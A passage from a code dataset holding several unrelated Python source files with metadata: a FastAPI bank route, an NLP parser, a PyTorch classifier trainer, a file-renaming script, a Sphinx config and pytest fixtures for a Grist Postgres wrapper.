return \" + result)\n return result\n except BankNotFound:\n logger.error(f\"Method get_bank_currencies except {BANK_NOT_FOUND}\")\n return JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n", "repo_name": "Racers-Squad/Ficha-Backend", "sub_path": "app/api/routes/bank.py", "file_name": "bank.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 24, "usage_type": "name"}, {"api_name": "fastapi.Query", "line_number": 23, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 24, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 24, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 26, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 26, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 28, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 28, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 29, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 20, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 40, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 40, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 40, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 42, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 42, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 45, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 45, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 47, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 48, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 36, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 58, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 58, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 58, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 60, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 60, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 63, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 63, "usage_type": "name"}, {"api_name": "app.utils.exceptions.BankNotFound", "line_number": 65, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 66, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.currencies.Currency", "line_number": 54, "usage_type": "name"}]}
+{"seq_id": "72561785767", "text": "import itertools\nimport threading\nfrom abc import ABC, abstractmethod\nfrom functools import lru_cache\nfrom typing import List, Tuple, Dict, Optional\nfrom fnmatch import fnmatch\n\nimport tokenizations\n\nfrom i18n import Language\nfrom models import Mwe\n\n\nclass Parsed:\n def __init__(self, language: Language, text: str, tokens: List[str],\n token_positions: List[Tuple[int, int]],\n lemmas: List[str]):\n self.language = language\n self.text = text\n self.tokens = tokens\n self.token_positions = token_positions\n self.lemmas = lemmas\n\n def contains_mwe(self, mwe: Mwe) -> bool:\n return self.contains_mwe_with_lemmas(mwe.lemmas)\n\n def contains_mwe_with_lemmas(self, lemmas: List[str]) -> bool:\n all_lemmas_exist = True\n\n for lemma in lemmas:\n this_lemma_exists = False\n for possible_lemma in lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n if any([fnmatch(parsed_lemma, possible_lemma) for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n elif any([fnmatch(parsed_token, possible_lemma) for parsed_token in self.tokens]):\n this_lemma_exists = True\n else:\n if any([parsed_lemma == possible_lemma for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n all_lemmas_exist = all_lemmas_exist and this_lemma_exists\n\n return all_lemmas_exist\n\n def get_mwe_indices(self, mwe: Mwe) -> Tuple:\n if not self.contains_mwe(mwe):\n raise AssertionError(\"Mwe should be in parsed sentence.\")\n\n mwe_lemma_positions: Dict[str, List[int]] = dict()\n for ix_tm, mwe_lemma in enumerate(mwe.lemmas):\n mwe_lemma_positions[mwe_lemma] = []\n for possible_lemma in mwe_lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n for ix, lemma in enumerate(self.lemmas):\n if fnmatch(lemma, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n for ix, token in enumerate(self.tokens):\n if fnmatch(token, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n else:\n for ix, lemma in enumerate(self.lemmas):\n if lemma == possible_lemma:\n mwe_lemma_positions[mwe_lemma].append(ix)\n\n mwe_instances = list(itertools.product(*[x for x in mwe_lemma_positions.values()]))\n mwe_instances_sorted = sorted(mwe_instances, key=lambda x: max(x) - min(x))\n return mwe_instances_sorted[0]\n\n def get_mwe_tokens(self, mwe: Mwe) -> List[str]:\n mwe_indices = self.get_mwe_indices(mwe)\n return [self.tokens[x] for x in mwe_indices]\n\n\nclass Parser(ABC):\n def __init__(self):\n self.parser_lock = threading.Lock()\n self.language = None\n\n @abstractmethod\n def get_sentence_count(self, text: str):\n pass\n\n @abstractmethod\n def lemmatize(self, text: str, mwe: Optional[Mwe] = None) -> Tuple[List[str], List[str]]:\n pass\n\n @lru_cache(maxsize=None)\n def parse(self, text: str, mwe: Mwe = None) -> Parsed:\n with self.parser_lock:\n tokens, lemmas = self.lemmatize(text, mwe)\n # print(\"Language:\", self.language)\n # print(\"Tokens:\", tokens)\n # print(\"Lemmas:\", lemmas)\n token_positions = tokenizations.get_original_spans(tokens, text)\n return Parsed(self.language, text, tokens, token_positions, lemmas)\n", "repo_name": "Dodiom/dodiom", "sub_path": "src/nlp/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "i18n.Language", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 34, "usage_type": "call"}, {"api_name": "fnmatch.fnmatch", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Mwe", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 55, "usage_type": "call"}, {"api_name": "fnmatch.fnmatch", "line_number": 58, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 65, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 45, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 69, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 74, "usage_type": "name"}, {"api_name": "threading.Lock", "line_number": 76, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 84, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 88, "usage_type": "name"}, {"api_name": "tokenizations.get_original_spans", "line_number": 94, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "40301737406", "text": "#!/usr/bin/env python3\n\"\"\"Train a classifier to classify images as backgroud or targets.\"\"\"\n\nimport argparse\nimport datetime\nimport pathlib\nfrom typing import Tuple\nimport tarfile\nimport shutil\nimport yaml\n\nimport torch\n\nfrom train import datasets\nfrom train.train_utils import utils, swa\nfrom core import classifier\nfrom data_generation import generate_config\n\n_LOG_INTERVAL = 50\n_SAVE_DIR = pathlib.Path(\"~/runs/uav-clf\").expanduser()\n\n\ndef train(model_cfg: dict, train_cfg: dict, save_dir: pathlib.Path = None) -> None:\n\n # TODO(alex) these paths should be in the generate config\n train_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_train\")\n eval_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_val\")\n\n use_cuda = torch.cuda.is_available()\n\n highest_score = {\"base\": 0, \"swa\": 0}\n\n clf_model = classifier.Classifier(\n backbone=model_cfg.get(\"backbone\", None),\n img_width=generate_config.PRECLF_SIZE[0],\n img_height=generate_config.PRECLF_SIZE[0],\n num_classes=2,\n )\n print(\"Model: \\n\", clf_model)\n\n if use_cuda:\n torch.backends.cudnn.benchmark = True\n clf_model.cuda()\n\n optimizer = create_optimizer(train_cfg[\"optimizer\"], clf_model)\n lr_params = train_cfg[\"lr_scheduler\"]\n\n epochs = train_cfg.get(\"epochs\", 0)\n assert epochs > 0, \"Please supply epoch > 0\"\n\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n float(lr_params.get(\"max_lr\", 1e-2)),\n total_steps=len(train_loader) * epochs,\n pct_start=float(lr_params.get(\"warmup_fraction\", 0.1)),\n div_factor=float(lr_params[\"max_lr\"]) / float(lr_params[\"start_lr\"]),\n final_div_factor=float(lr_params[\"start_lr\"]) / float(lr_params[\"end_lr\"]),\n )\n\n loss_fn = torch.nn.CrossEntropyLoss()\n global_step = 0\n\n for epoch in range(epochs):\n all_losses = []\n\n for idx, (data, labels) in enumerate(train_loader):\n optimizer.zero_grad()\n global_step += 1\n\n if use_cuda:\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n losses = loss_fn(out, labels)\n all_losses.append(losses.item())\n\n # Compute the gradient throughout the model graph\n losses.backward()\n optimizer.step()\n lr_scheduler.step()\n\n if idx % _LOG_INTERVAL == 0:\n lr = optimizer.param_groups[0][\"lr\"]\n print(\n f\"Epoch: {epoch} step {idx}, loss {sum(all_losses) / len(all_losses):.5}. lr: {lr:.4}\"\n )\n\n # Call evaluation function\n clf_model.eval()\n highest_score = eval_acc = eval(\n clf_model, eval_loader, use_cuda, highest_score, save_dir,\n )\n clf_model.train()\n\n print(\n f\"Epoch: {epoch}, Training loss {sum(all_losses) / len(all_losses):.5} \\n\"\n f\"Base accuracy: {eval_acc['base']:.4} \\n\"\n )\n\n\ndef eval(\n clf_model: torch.nn.Module,\n eval_loader: torch.utils.data.DataLoader,\n use_cuda: bool = False,\n previous_best: dict = None,\n save_dir: pathlib.Path = None,\n) -> float:\n \"\"\" Evalulate the model against the evaulation set. Save the best \n weights if specified. \"\"\"\n num_correct, total_num = 0, 0\n\n with torch.no_grad():\n for data, labels in eval_loader:\n\n if torch.cuda.is_available():\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n _, predicted = torch.max(out.data, 1)\n\n num_correct += (predicted == labels).sum().item()\n total_num += data.shape[0]\n\n accuracy = {\n \"base\": num_correct / total_num,\n }\n\n if accuracy[\"base\"] > previous_best[\"base\"]:\n print(f\"Saving model with accuracy {accuracy}.\")\n\n # Delete the previous best\n utils.save_model(clf_model, save_dir / \"classifier.pt\")\n\n return accuracy\n else:\n return previous_best\n\n\ndef create_data_loader(\n train_cfg: dict, data_dir: pathlib.Path,\n) -> Tuple[torch.utils.data.DataLoader, torch.utils.data.DataLoader]:\n batch_size = train_cfg.get(\"batch_size\", 64)\n\n assert data_dir.is_dir(), data_dir\n\n dataset = datasets.ClfDataset(data_dir, img_ext=generate_config.IMAGE_EXT,)\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, pin_memory=True, shuffle=True\n )\n return loader\n\n\ndef create_optimizer(optim_cfg: dict, model: torch.nn.Module) -> torch.optim.Optimizer:\n \"\"\" Take in optimizer config and create the optimizer for training. \"\"\"\n name = optim_cfg.get(\"type\", None)\n if name.lower() == \"sgd\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.SGD(\n model.parameters(),\n lr=lr,\n momentum=momentum,\n weight_decay=weight_decay,\n nesterov=True,\n )\n elif name.lower() == \"rmsprop\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.RMSprop(\n model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay\n )\n else:\n raise ValueError(f\"Improper optimizer supplied {name}.\")\n\n return optimizer\n\n\nif __name__ == \"__main__\":\n torch.random.manual_seed(42)\n\n if torch.cuda.is_available():\n torch.cuda.random.manual_seed(42)\n\n parser = argparse.ArgumentParser(\n description=\"Trainer code for classifcation models.\"\n )\n parser.add_argument(\n \"--model_config\",\n required=True,\n type=pathlib.Path,\n help=\"Path to yaml model definition.\",\n )\n args = parser.parse_args()\n\n config_path = args.model_config.expanduser()\n assert config_path.is_file(), f\"Can't find {config_path}.\"\n\n # Load the model config\n config = yaml.safe_load(config_path.read_text())\n\n model_cfg = config[\"model\"]\n train_cfg = config[\"training\"]\n\n # Copy in this config file to the save dir. The config file will be used to load the\n # saved model.\n save_dir = _SAVE_DIR / (\n datetime.datetime.now().isoformat().split(\".\")[0].replace(\":\", \".\")\n )\n save_dir.mkdir(parents=True)\n shutil.copy(config_path, save_dir / \"config.yaml\")\n\n train(model_cfg, train_cfg, save_dir)\n\n # Create tar archive if best weights are saved.\n with tarfile.open(save_dir / \"classifier.tar.gz\", mode=\"w:gz\") as tar:\n for model_file in save_dir.glob(\"*\"):\n tar.add(model_file, arcname=model_file.name)\n print(f\"Saved model to {save_dir / 'classifier.tar.gz'}\")\n", "repo_name": "alexwitt23/uav-austin", "sub_path": "train/train_clf.py", "file_name": "train_clf.py", "file_ext": "py", "file_size_in_byte": 6834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 26, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 26, "usage_type": "name"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "core.classifier.Classifier", "line_number": 33, "usage_type": "call"}, {"api_name": "core.classifier", "line_number": 33, "usage_type": "name"}, {"api_name": "data_generation.generate_config.PRECLF_SIZE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 35, "usage_type": "name"}, {"api_name": "data_generation.generate_config.PRECLF_SIZE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.backends", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 121, "usage_type": "call"}, {"api_name": "train.train_utils.utils.save_model", "line_number": 134, "usage_type": "call"}, {"api_name": "train.train_utils.utils", "line_number": 134, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "train.datasets.ClfDataset", "line_number": 148, "usage_type": "call"}, {"api_name": "train.datasets", "line_number": 148, "usage_type": "name"}, {"api_name": "data_generation.generate_config.IMAGE_EXT", "line_number": 148, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 149, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.optim.RMSprop", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 173, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.random.manual_seed", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.random", "line_number": 183, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.cuda.random.manual_seed", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 186, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 188, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 203, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 211, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 211, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 214, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 219, "usage_type": "call"}]}
+{"seq_id": "21198317732", "text": "from datetime import datetime\nimport pandas as pd\nimport os\nfrom datetime import timedelta\n\nnome_list = []\n\ndir = input(\"Input directory: \")\n\nano_inicial = input(\"Input data inicial - timestep: \")\ndata_fmt = input(\"Input formato datetime: \")\nano_inicial_data = datetime.strptime(ano_inicial.strip(), data_fmt)\n\ndata_final_lista = pd.DataFrame(columns=[\"data\",\"dias\"])\n\nfor nome_arquivo in os.listdir(dir):\n #print(nome_arquivo.split(\".\")[0])\n \n dias=int(nome_arquivo.split(\".\")[0])\n \n data_final = ano_inicial_data + timedelta(days=dias*3)\n data_formatada = data_final.strftime(data_fmt)\n print(data_formatada)\n \n os.rename(dir + nome_arquivo, dir + data_formatada + \".nc\")\n \n data_final_lista = data_final_lista.append({\"data\":data_formatada,\"dias\":dias}, ignore_index=True)\n\ndata_final_lista.to_csv(\"lista_datas.csv\")", "repo_name": "IgorErhardt/Cod_Bank", "sub_path": "Filename_to_YMD.py", "file_name": "Filename_to_YMD.py", "file_ext": "py", "file_size_in_byte": 853, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 21, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "33513543923", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# -- General configuration -----------------------------------------------------\n\nimport datetime\nimport warnings\nimport sys\nimport os\n\nwarnings.simplefilter('ignore', DeprecationWarning)\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'repoze.sphinx.autointerface',\n 'sphinx.ext.viewcode',\n 'sphinx.ext.intersphinx'\n]\n\nintersphinx_mapping = {\n #'zcomponent': ('http://docs.zope.org/zope.component', None),\n 'sqla': ('http://docs.sqlalchemy.org/en/latest', None),\n 'validictory': ('http://validictory.readthedocs.org/en/latest', None),\n 'who': ('http://docs.repoze.org/who/latest', None),\n 'python3': ('http://docs.python.org/3', None),\n 'tstring': ('http://docs.pylonsproject.org/projects/translationstring/en/latest', None),\n 'venusian': ('http://docs.pylonsproject.org/projects/venusian/en/latest', None),\n}\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\nmaster_doc = 'index'\n\n# General information about the project.\nproject = 'edapi'\nthisyear = datetime.datetime.now().year\ncopyright = '2013-%s, Amplify Insight ' % thisyear\n\n\nversion = '1.0'\n\nrelease = version\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build']\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\nadd_module_names = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n\n# -- Options for HTML output ---------------------------------------------------\n\nsys.path.append(os.path.abspath('_themes'))\nhtml_theme_path = ['_themes']\nhtml_theme = 'pyramid'\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\nhtml_title = 'EdAPI RESTful Development Framework'\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\nhtml_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\nhtml_show_sphinx = False\nhtml_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'edapidoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #'papersize': 'letterpaper',\n\n # The font size ('10pt', '11pt' or '12pt').\n #'pointsize': '10pt',\n\n # Additional stuff for the LaTeX preamble.\n #'preamble': '',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [('index', 'edapi.tex', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'manual'),\n ]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'edapi', 'edapi Documentation',\n ['@dip @tosako @agrebneva @dwu'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [('index', 'edapi', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'edapi', 'One line description of project.',\n 'Miscellaneous'),\n ]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n\n# If true, do not generate a @detailmenu in the \"Top\" node's menu.\n#texinfo_no_detailmenu = False\n", "repo_name": "SmarterApp/RDW_DataWarehouse", "sub_path": "edapi/docs/conf.py", "file_name": "conf.py", "file_ext": "py", "file_size_in_byte": 6457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.simplefilter", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}]}
+{"seq_id": "14382680878", "text": "from test.defaults import (GRIST_API_KEY, GRIST_DOC_ID,\n GRIST_SERVER_FROM_LOCAL, GRIST_SERVER_FROM_POSTGRES,\n POSTGRES_HOST, POSTGRES_PASSWORD, POSTGRES_PORT,\n POSTGRES_USER)\n\nimport psycopg2\nimport pytest\nfrom grist_api import GristDocAPI\n\n\n@pytest.fixture\ndef conn():\n \"\"\"\n Connection to postgres with multicorn and gristfdw installed\n \"\"\"\n with psycopg2.connect(f\"postgres://{POSTGRES_USER}:{POSTGRES_PASSWORD}@{POSTGRES_HOST}:{POSTGRES_PORT}\") as c:\n\n with c.cursor() as cur:\n cur.execute(\"\"\"\n CREATE EXTENSION IF NOT EXISTS multicorn;\n \"\"\")\n\n yield c\n\n\n@pytest.fixture\ndef server(conn):\n \"\"\"\n Sets up our external server in postgres\n \"\"\"\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE SERVER test FOREIGN DATA WRAPPER multicorn OPTIONS (\n wrapper 'gristfdw.GristForeignDataWrapper',\n api_key '{GRIST_API_KEY}',\n doc_id '{GRIST_DOC_ID}',\n server '{GRIST_SERVER_FROM_POSTGRES}'\n );\n \"\"\")\n\n yield \"test\"\n\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test CASCADE\")\n\n\n@pytest.fixture\ndef schema(conn):\n name = \"gristfdw_schema\"\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name};\"\"\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"CREATE SCHEMA {name};\"\"\")\n\n yield name\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name} CASCADE;\"\"\")\n\n\n@pytest.fixture\ndef simple_table(conn, server, table_name):\n\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\"\")\n with conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE FOREIGN TABLE \\\"{table_name}\\\" (\n id BIGINT,\n col1 TEXT,\n col2 FLOAT,\n col3 BIGINT,\n col4 BOOLEAN,\n col5 DATE,\n col9 BIGINT,\n col10 BIGINT[]\n )\n SERVER {server}\n OPTIONS (table_name '{table_name}')\n \"\"\")\n yield\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\" CASCADE\")\n\n\n@pytest.fixture\ndef grist_api(monkeypatch):\n monkeypatch.setenv(\"GRIST_API_KEY\", GRIST_API_KEY)\n return 